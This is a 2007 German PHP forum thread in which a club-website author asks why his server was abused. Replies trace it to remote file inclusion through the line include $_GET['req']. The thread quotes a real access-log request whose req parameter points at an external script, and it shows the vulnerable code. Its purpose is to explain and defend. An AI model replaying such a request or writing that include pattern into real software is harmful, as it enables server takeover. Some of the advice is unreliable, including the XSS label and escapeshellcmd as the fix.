PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr

PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr (https://www.php-resource.de/forum/)
-   IT-Security (https://www.php-resource.de/forum/it-security/)
-   -   [Hilfe] Webscript ausgebäutet - Urheberrechtsstrafe (https://www.php-resource.de/forum/it-security/80629-hilfe-webscript-ausgebaeutet-urheberrechtsstrafe.html)

Clamsy1111 23-01-2007 22:41

[Hilfe] Webscript ausgebäutet - Urheberrechtsstrafe
 
Hallo,

ich habe ein Webscript programmiert - Eigentlich eine ganz normale Vereinsseite eines Sport-Schützen-Vereines. Jetzt wurde der Server für mich gesperrt und habe eine Urheberrechtsstrafe zu zahlen.

Folgendes ist passiert.

Ich übergebe den Seiteninhalt Aufruf mit POST und GET also schaut meine URL wie folgt aus:

www.serveradresse.de/index.php?req=main

das Script weis dann das es die inhalte aus der SQL Datenbank unter dem Eintrag main hervorholen soll.

Jetzt wurde mein Script angeblich dazu verwendet um Dateien auf dem Server abzulegen. Angeblich Videos und so und der Hacker oder wie auch immer hat meine Index Datei benutzt um diese angeblich von meinem Server abzurufen.

Der link laut LOG dateien sieht wie folgt aus... (IP Adresse mit absicht gepostet, da es von irgendjemanden ist, der am 13.01.2007 dieses URL ausgeführt hat.)

87.6.106.140 - - [13/Jan/2007:15:49:56 +0100] "GET /index.php?req=http://beforethehighway.com/phpmyadmin/osx-sux.jpg? HTTP/1.1" 200 56519 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"

Ich verstehe nur nicht wie 1. derjenige über diese Zeile angebliche Files auf meinen Server legen hätte können, und 2. wie er sie mit diesem Befehl für andere zur Verfügung stellen kann.

3. kann ich der Urheberrechtsstrafe auskommen, da hier ja ein Hacker unterwegs war?

4. ich finde nur Logs wo er abfragen gemacht hatte, aber nicht wo der Upload stattgefunden hat.

5. Ich habe auf einer Englischen Seite einen Eintrag gefunden unter:
http://www.castlecops.com/modules.ph...&id=44833&in=1

Hier ist auch was dazu erwähnt, aber ich komm damit nicht klar, weil hier von Ebay die rede ist. Laut meinem Serverbetreiber aber Videos und Online Casinos und Strip Poker anbieter sich abgelegt hätten.

6. Ist der Serverbetreiber nicht auch dafür verantwortlich das Seiten die er hostet geschützt werden durch unbefugtes Hacken?

7. Mit der seite http://beforethehighway.com kann man nicht wirklich was anfangen, ausser wenn man sich mal deren Quellcode ansieht, aber daraus werde ich auch nicht schlau, wie dieses Script aus Unterordnern meiner Seite welche ich für meine Zwecke eingerichtet hatte, genau eine bestimmte Datei ziehen kann. Noch dazu weil der Abfragelink immer der gleiche ist, aber ca von 500 verschiedenen Personen abgerufen wurde (IP-Adressen unterschiedlich) und das in nur wenigen Stunden.

Ich wäre euch echt dankbar, wenn mir hier einer eine Hilfe geben kann.
Wenn Ihr noch ein paar nähere Infos für meine Problematik habt, dann schreibt bzw. fragt mich, ich brauche eure hilfe, und somit gebe ich euch die nötigen Infos...

Schöne Grüße
Clamsy

wahsaga 23-01-2007 22:50

Re: [Hilfe] Webscript ausgebäutet - Urheberrechtsstrafe
 
Zitat:

Original geschrieben von Clamsy1111
Ich verstehe nur nicht wie 1. derjenige über diese Zeile angebliche Files auf meinen Server legen hätte können
Wenn ich die enthaltene Adresse abrufe, meldet sich sofort mein AntiVir, und meldet einen "PHP-Virus" - also wohl irgendein Script, welches entsprechende Upload-Funktionalität bereitstellt.

Und da du wohl dummerweise dein eigenes Script so geschrieben hast, dass sich darüber beliebige externe Ressourcen einbinden lassen, konnte der so sein Script auf deinem Server ausführen ...
Zitat:

Ist der Serverbetreiber nicht auch dafür verantwortlich das Seiten die er hostet geschützt werden durch unbefugtes Hacken?
*lol*

Man könnte ihm höchstens vorwerfen, allow_url_fopen aktiviert zu haben - da das aber viele Kunden verlangen, ist das eigentlich nichts besonderes.

Schuld an dem ganzen war dein miserabel und dilletantisch geschriebenes Script.


Mein guter Rat: Gehe mit der Sache zu einem Anwalt, und lasse dich kundig beraten, wie du der "Strafforderung" (vermutlich meinst du eine Abmahnung?) vielleicht noch entgehen kannst, weil du dein Script nur aus Naivität und nicht mutwillig so dümmlich geschrieben hast, dass es ganz leicht hackbar war.

combie 23-01-2007 23:32

Die kaputte, gefährliche Stelle sieht in etwa so aus:
PHP-Code:

include $_GET['req']; 

Da können natürlich noch weitere Böcke drinstecken....

asp2php 23-01-2007 23:49

vielleicht sollten wir diesen Thread als Sticky festnageln, damit die Scriptkiddies endlich die "Proggerei" ernst nehmen und uns nicht immer vorwerfen, dass wir zu grob zu denjenigen waren, die kaum Grundlagen beherrschen :D

Wyveres 24-01-2007 08:59

jetzt weis ich das ich dinge die ich per GET übergebe nie wieder ungeprüft ins skript lasse ...

merke wenn du steuerst mit GET dann prüfe auch ob das was oben im get ankommt auch das ist was du erwartest.

(irgenntwo hatte ich doch diese ironie gelassen fragt mich blos nicht wo :)

ansonsten schliesse auch ich mich meinen vorrednern an und sage. geh schleunigst zum anwalt.

MfG Wyveres

Lord Q 07-02-2007 15:06

1. Never trust the user

2. All incoming data is EVIL

Du kommst nicht drum rum alles zu filtern was irgendwo vom Nutzer eingegeben werden kann und das schließt selbstverständlich auch die URL ein.

Die Funktion escapeshellcmd() ist schon mal ein guter Anfang, zum Maskieren von Steuerzeichen in Eingaben, ansonsten RegEx´s zum Filtern oder du speicherst alle erlaubten "req"-Parameter in ner Liste.

Und falls es dich interessiert, die Angriffstechnik bezeichnet man auch als XSS = Cross-Site-Scripting, in diesem Fall serverseitig durch einbeiden eines externen Scripts.

wahsaga 07-02-2007 15:38

Zitat:

Original geschrieben von Lord Q
Und falls es dich interessiert, die Angriffstechnik bezeichnet man auch als XSS = Cross-Site-Scripting, in diesem Fall serverseitig durch einbeiden eines externen Scripts.
Wobei letzteres wohl eher Code Injection wäre.

jahlives 07-02-2007 16:23

@topicstarter
Im Quellcode der von dir angegebenen Seite findest du zwei IP's. Eine aus gehört einem Anbieter aus Dallas und eine einem Anbieter aus Estland. Von diesen beiden Servern lädt der Schadcode weitere Daten runter.
Ggf mal die Betreiber anschreiben. Wenn das nicht hilft, dann eine Anzeige bei der Polizei unter Angabe aller Daten. Dann sollten die Betreiber solche Daten eher rausrücken.
Ob's hilft ist was anderes...

Gruss

tobi

hall 07-02-2007 21:46

ein wenig lektüre zum thema

http://www.heise.de/security/artikel/84149/0


Alle Zeitangaben in WEZ +2. Es ist jetzt 08:14 Uhr.

Powered by vBulletin® Version 3.8.2 (Deutsch)
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.3.0
[c] ebiz-consult GmbH & Co. KG